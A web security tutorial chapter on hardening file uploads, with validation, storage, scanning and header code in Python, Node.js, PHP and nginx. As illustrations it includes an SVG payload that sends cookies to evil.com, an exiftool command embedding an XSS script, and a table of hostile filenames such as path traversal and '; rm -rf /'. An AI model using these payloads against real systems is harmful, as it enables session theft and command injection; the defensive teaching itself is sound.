File Upload Hardening
Building Securely Without Delay
Web risk is rarely mysterious. It usually lies in predictable mistakes that persist under time pressure.
In File Upload Hardening you reduce risk with type checking, isolation, scanning, and restricted execution permissions.
This makes security less of a loose afterthought check and more of a standard quality of your product.
Immediate measures (15 minutes)
Why this matters
The core of File Upload Hardening is risk reduction in practice. Technical context supports the choice of measures, but implementation and embedding are central.
Why file uploads are dangerous
An unsecured file upload opens the door to virtually every attack category:
| Attack | Mechanism | Impact |
|---|---|---|
| Malware distribution | Server is used to host and distribute malware | Reputational damage, legal liability |
| Path traversal | Filename contains ../../ to write outside the upload directory |
Overwriting configuration files, RCE |
| Denial of Service | Extremely large files or enormous numbers of uploads | Disk space exhausted, service unavailable |
| Stored XSS via SVG | SVG file with embedded <script> tags |
Session theft, account takeover |
| Stored XSS via HTML | HTML file with JavaScript, served with
text/html |
Session theft, phishing |
| EXIF data injection | Metadata in images contains payloads | XSS, SQL injection via metadata parsing |
| XML External Entity | Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads | SSRF, file disclosure |
| Polyglot files | File is simultaneously a valid JPEG and a valid PHP script | Bypass of validation, RCE |
The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.
File type validation
Extension allowlist
Always use an allowlist of permitted
extensions, never a blocklist. A blocklist is by definition
incomplete: you block .php but forget
.phtml, .pht, .php5,
.phar, or .shtml.
# Python - extension allowlist
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}
def allowed_file(filename: str) -> bool:
ext = os.path.splitext(filename)[1].lower()
return ext in ALLOWED_EXTENSIONS// Node.js - extension allowlist
const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);
function allowedFile(filename) {
const ext = path.extname(filename).toLowerCase();
return ALLOWED_EXTENSIONS.has(ext);
}MIME type validation
The Content-Type header is set by the
client and is therefore fundamentally unreliable.
An attacker can upload a PHP webshell with
Content-Type: image/jpeg. Verify the MIME type
server-side based on the file contents:
# Python - server-side MIME detection with python-magic
import magic
def validate_mime(filepath: str, allowed_mimes: set) -> bool:
mime = magic.from_file(filepath, mime=True)
return mime in allowed_mimes
ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';
async function validateMime(filepath, allowedMimes) {
const result = await fileTypeFromFile(filepath);
if (!result) return false;
return allowedMimes.has(result.mime);
}// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($filepath);
return in_array($mime, $allowedMimes, true);
}Magic bytes validation
Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.
| File type | Magic bytes (hex) | Extension | MIME type |
|---|---|---|---|
| JPEG | FF D8 FF |
.jpg, .jpeg |
image/jpeg |
| PNG | 89 50 4E 47 0D 0A 1A 0A |
.png |
image/png |
| GIF87a | 47 49 46 38 37 61 |
.gif |
image/gif |
| GIF89a | 47 49 46 38 39 61 |
.gif |
image/gif |
25 50 44 46 2D |
.pdf |
application/pdf |
|
| ZIP (DOCX/XLSX) | 50 4B 03 04 |
.zip, .docx, .xlsx |
application/zip |
| RIFF (WebP) | 52 49 46 46 |
.webp |
image/webp |
| SVG | 3C 3F 78 6D 6C or 3C 73 76 67 |
.svg |
image/svg+xml |
# Python - magic bytes validation
MAGIC_BYTES = {
b'\xff\xd8\xff': 'image/jpeg',
b'\x89PNG\r\n\x1a\n': 'image/png',
b'GIF87a': 'image/gif',
b'GIF89a': 'image/gif',
b'%PDF-': 'application/pdf',
}
def check_magic_bytes(filepath: str) -> str | None:
with open(filepath, 'rb') as f:
header = f.read(8)
for magic, mime in MAGIC_BYTES.items():
if header.startswith(magic):
return mime
return NoneCombined validation
Never rely on a single layer. Combine all three methods:
def validate_upload(filename: str, filepath: str) -> bool:
# Layer 1: extension
if not allowed_file(filename):
return False
# Layer 2: magic bytes
detected_type = check_magic_bytes(filepath)
if detected_type not in ALLOWED_MIMES:
return False
# Layer 3: server-side MIME
if not validate_mime(filepath, ALLOWED_MIMES):
return False
return TrueFilename sanitization
The original filename of an upload is user input and must be treated as such. Never trust it.
Dangerous filenames
| Attack technique | Example | Risk |
|---|---|---|
| Path traversal | ../../../etc/cron.d/backdoor |
Overwriting files outside upload dir |
| Null byte injection | shell.php%00.jpg |
Old parsers see .jpg, server executes .php |
| Double extension | document.php.jpg |
Depending on server configuration: execution as PHP |
| Unicode tricks | image\u202E\u0067np.php (right-to-left override) |
Filename appears as imagphp.png in UI |
| Overlength name | A x 10000 + .jpg |
Buffer overflows, filesystem errors |
| Special characters | ; rm -rf / ;.jpg |
Command injection with unsafe processing |
| Windows reserved | CON.jpg, NUL.png,
AUX.pdf |
System errors on Windows servers |
| Dots and spaces | shell.php. or shell.php |
Windows strips trailing dots/spaces: becomes
shell.php |
Safe approach: renaming
The safest strategy is to completely ignore the original filename and assign a UUID:
import uuid
import os
def safe_filename(original_filename: str) -> str:
ext = os.path.splitext(original_filename)[1].lower()
if ext not in ALLOWED_EXTENSIONS:
raise ValueError(f"Extension not allowed: {ext}")
return f"{uuid.uuid4().hex}{ext}"// Node.js
const { randomUUID } = require('crypto');
const path = require('path');
function safeFilename(originalFilename) {
const ext = path.extname(originalFilename).toLowerCase();
if (!ALLOWED_EXTENSIONS.has(ext)) {
throw new Error(`Extension not allowed: ${ext}`);
}
return `${randomUUID().replace(/-/g, '')}${ext}`;
}If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:
# Database: preserve original name, UUID on disk
upload = Upload(
original_name=secure_filename(file.filename),
stored_name=safe_filename(file.filename),
uploaded_by=current_user.id
)os.path.basename() is not enough
os.path.basename() prevents path traversal but
does not protect against double extensions, null bytes, or Unicode tricks.
Use it as an additional layer, not as the sole defense:
# Minimum: basename + Werkzeug secure_filename
from werkzeug.utils import secure_filename
name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in databaseStorage hardening
Store outside the webroot
Rule number one: never store uploads in a
directory that is directly served by the web server. If an
attacker uploads a webshell to /var/www/html/uploads/,
they can call it directly via the browser.
# Wrong: inside webroot
/var/www/html/
├── index.php
└── uploads/ <-- directly accessible via http://site/uploads/
└── shell.php <-- http://site/uploads/shell.php = RCE
# Correct: outside webroot
/var/www/html/
└── index.php
/srv/uploads/ <-- not directly accessible via HTTP
└── a3f8b2c1.jpg
Serve uploads via an application route that enforces access control and content-type headers:
# Flask - serve uploads via application
@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
upload = Upload.query.get_or_404(file_id)
return send_from_directory(
app.config['UPLOAD_FOLDER'],
upload.stored_name,
mimetype=upload.detected_mime, # No text/html!
as_attachment=True
)Dedicated storage service
Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:
# AWS S3 - pre-signed upload URL
import boto3
s3 = boto3.client('s3')
def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
return s3.generate_presigned_url(
'put_object',
Params={
'Bucket': bucket,
'Key': key,
'ContentType': 'image/jpeg',
},
ExpiresIn=expires
)
# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
return s3.generate_presigned_url(
'get_object',
Params={
'Bucket': bucket,
'Key': key,
'ResponseContentDisposition': 'attachment',
},
ExpiresIn=expires
)No execute permissions
Ensure that the upload directory has no execute permissions:
# Filesystem permissions
chmod 750 /srv/uploads
chown www-data:www-data /srv/uploads
# No execute bit on files
chmod 640 /srv/uploads/*Nginx: block execution in upload directory
# nginx - block script execution in upload location
location /uploads/ {
# Force download, never execute
add_header Content-Disposition "attachment" always;
add_header X-Content-Type-Options "nosniff" always;
# Explicitly block all script extensions
location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
deny all;
return 403;
}
# No directory listing
autoindex off;
}
Separate domain for user content
Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:
# Main application
app.example.com -> session cookies, CSRF tokens
# User content (separate domain, no cookies from main app)
content.example.com -> uploads, profile images
If an attacker achieves XSS via an uploaded SVG file on
content.example.com, they have no access to cookies from
app.example.com.
Size and quantity limits
Without limits, your upload endpoint is an invitation for Denial of Service.
Server configuration
# nginx - maximum body size
http {
client_max_body_size 10m; # Global: max 10 MB
client_body_timeout 30s; # Timeout for receiving body
client_body_buffer_size 128k;
}
# Per location override
location /api/upload {
client_max_body_size 25m; # Specific endpoint: max 25 MB
}
Application limits
# Flask - file size limit
app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024 # 10 MB
@app.errorhandler(413)
def too_large(e):
return jsonify(error="File too large (max 10 MB)"), 413// Express + multer - file size and quantity limits
const multer = require('multer');
const upload = multer({
dest: '/srv/uploads/',
limits: {
fileSize: 10 * 1024 * 1024, // 10 MB per file
files: 5, // Max 5 files per request
fields: 10, // Max 10 form fields
},
fileFilter: (req, file, cb) => {
const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
const ext = path.extname(file.originalname).toLowerCase();
cb(null, allowed.includes(ext));
}
});
app.post('/upload', upload.array('files', 5), (req, res) => {
res.json({ uploaded: req.files.length });
});Rate limiting
# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter
limiter = Limiter(app, key_func=get_remote_address)
@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour") # Max 10 uploads per hour per IP
@limiter.limit("3/minute") # Max 3 per minute
def upload_file():
...Antivirus scanning
Scan every uploaded file for malware before it is stored or made available.
ClamAV integration
# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam # Signature update
sudo systemctl start clamav-daemon# Python - scanning with pyclamd
import pyclamd
class VirusScanner:
def __init__(self):
self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
if not self.cd.ping():
raise RuntimeError("ClamAV daemon not reachable")
def scan_file(self, filepath: str) -> tuple[bool, str | None]:
"""Returns (is_clean, threat_name)."""
result = self.cd.scan_file(filepath)
if result is None:
return True, None
# result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
status, threat = list(result.values())[0]
return False, threat
# Usage in upload handler
scanner = VirusScanner()
@app.route('/upload', methods=['POST'])
def upload():
file = request.files['file']
temp_path = os.path.join('/tmp', safe_filename(file.filename))
file.save(temp_path)
is_clean, threat = scanner.scan_file(temp_path)
if not is_clean:
os.remove(temp_path)
app.logger.warning(f"Malware detected: {threat}")
return jsonify(error="File rejected by virus scanner"), 400
# File is clean, move to permanent storage
final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
shutil.move(temp_path, final_path)
return jsonify(status="ok"), 201Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.
Image-specific risks
SVG with embedded JavaScript
SVG is XML and can contain arbitrary JavaScript:
<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
<script>document.location='https://evil.com/?c='+document.cookie</script>
<rect width="100" height="100" fill="red"/>
</svg>Defense: never serve SVG with
Content-Type: image/svg+xml if it is user-uploaded content.
Use Content-Disposition: attachment or convert
to a raster format.
EXIF data with payloads
EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:
# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpgImage re-encoding as defense
By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:
# Python - strip EXIF and re-encode with Pillow
from PIL import Image
import io
def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
"""Re-encode image: strips EXIF, removes embedded content."""
with Image.open(input_path) as img:
# Verify that it is actually an image
img.verify()
# Reopen after verify (verify makes object unusable)
with Image.open(input_path) as img:
# Convert to RGB (removes alpha-channel tricks)
if img.mode not in ('RGB', 'L'):
img = img.convert('RGB')
# Limit dimensions
img.thumbnail(max_size, Image.LANCZOS)
# Save without EXIF data
img.save(output_path, format='JPEG', quality=85, exif=b'')// Node.js - re-encode with sharp
const sharp = require('sharp');
async function sanitizeImage(inputPath, outputPath) {
await sharp(inputPath)
.rotate() // Auto-rotate based on EXIF, then strip
.resize(4096, 4096, {
fit: 'inside',
withoutEnlargement: true
})
.removeAlpha()
.jpeg({ quality: 85 })
.toFile(outputPath);
}Content-Security-Policy for uploads
Add a strict CSP to responses for user-uploaded content:
@app.after_request
def add_upload_csp(response):
if request.path.startswith('/files/'):
response.headers['Content-Security-Policy'] = (
"default-src 'none'; "
"style-src 'none'; "
"script-src 'none'; "
"object-src 'none'"
)
response.headers['X-Content-Type-Options'] = 'nosniff'
return responseIt is always a delight to see how applications handle
file uploads. "The user can upload a profile photo here," says
the product owner, with full confidence that users will obediently
pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline
from the public internet to your server's filesystem,
protected by exactly zero layers of validation and an extension blocklist
that contains .exe and .bat but forgot .php.
Because yes, who uploads a PHP file as
a profile photo? Only everyone who wants to take over your application. But no
worries -- the Content-Type header says image/jpeg, so it
must be safe. That header is after all set by... the attacker.
The same type of logic as a nightclub that asks visitors to write their own
age on a note. "He wrote 21, let him through." And to top it all off
we store everything nicely in
/var/www/html/uploads/, directly accessible and executable
via the browser, because that saves us configuring a proxy route.
Security by convenience.
Common mistakes
| # | Mistake | Why it is dangerous | Solution |
|---|---|---|---|
| 1 | Extension check only | Trivially bypassed by renaming | Combine with magic bytes and MIME detection |
| 2 | Blocklist instead of allowlist | You always forget an extension (.phtml,
.phar, .shtml) |
Use a strict allowlist |
| 3 | Trusting the Content-Type header | Set by the client, fully manipulable | Server-side detection with libmagic/file-type |
| 4 | Storage in webroot | Direct execution of uploaded script | Store outside webroot, serve via application |
| 5 | Keeping the original filename | Path traversal, double extensions, Unicode tricks | UUID renaming, original name in database |
| 6 | No size limit | DoS through large uploads | Configure max on web server and application |
| 7 | No rate limiting | Brute force upload, disk space exhaustion | Limit per IP per time unit |
| 8 | Allowing SVG without sanitization | Embedded JavaScript, XSS | Block SVG or convert to raster |
| 9 | Passing EXIF data to frontend | XSS via metadata fields | Strip EXIF, re-encode images |
| 10 | No antivirus scanning | Malware distribution via your platform | Integrate ClamAV or similar scanner |
| 11 | No Content-Disposition header | Browser renders file instead of downloading | Always attachment for user content |
| 12 | Same domain for app and uploads | XSS in upload has access to session cookies | Use a separate content domain |
Checklist
| Priority | Measure | Implementation |
|---|---|---|
| CRITICAL | Extension allowlist | Code: only accept explicitly permitted extensions |
| CRITICAL | Magic bytes validation | Code: python-magic, file-type, finfo |
| CRITICAL | Storage outside webroot | Infrastructure: separate directory, serve via app route |
| CRITICAL | Filename sanitization | Code: UUID renaming, original name in database |
| HIGH | Size limits | Web server: client_max_body_size; App:
MAX_CONTENT_LENGTH |
| HIGH | Remove execute permissions | Infrastructure: chmod, nginx location block |
| HIGH | Content-Disposition header | Code/web server: attachment for all user uploads |
| HIGH | X-Content-Type-Options: nosniff | Code/web server: prevent MIME sniffing by browser |
| HIGH | Image re-encoding | Code: Pillow/sharp for strip EXIF + re-encode |
| MEDIUM | Antivirus scanning | Infrastructure: ClamAV daemon + pyclamd integration |
| MEDIUM | Rate limiting | Code: Flask-Limiter, express-rate-limit |
| MEDIUM | Separate content domain | Infrastructure: content.example.com for user
uploads |
| MEDIUM | CSP on upload responses | Code: strict Content-Security-Policy header |
| LOW | Pre-signed URLs (S3/GCS) | Infrastructure: object storage with temporary URLs |
| LOW | SVG-to-raster conversion | Code: Pillow/sharp/Inkscape for SVG sanitization |
Summary -- File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. The combination of strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious -- because it is, until proven otherwise.
In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.
Further reading in the knowledge base
These articles in the portal provide more background and practical context:
- APIs -- the invisible glue of the internet
- SSL/TLS -- why that padlock in your browser matters
- Encryption -- the art of making things unreadable
- Password hashing -- how websites store your password
- Penetration tests vs. vulnerability scans
You need an account to access the knowledge base. Log in or register.
Related security measures
These articles provide additional context and depth: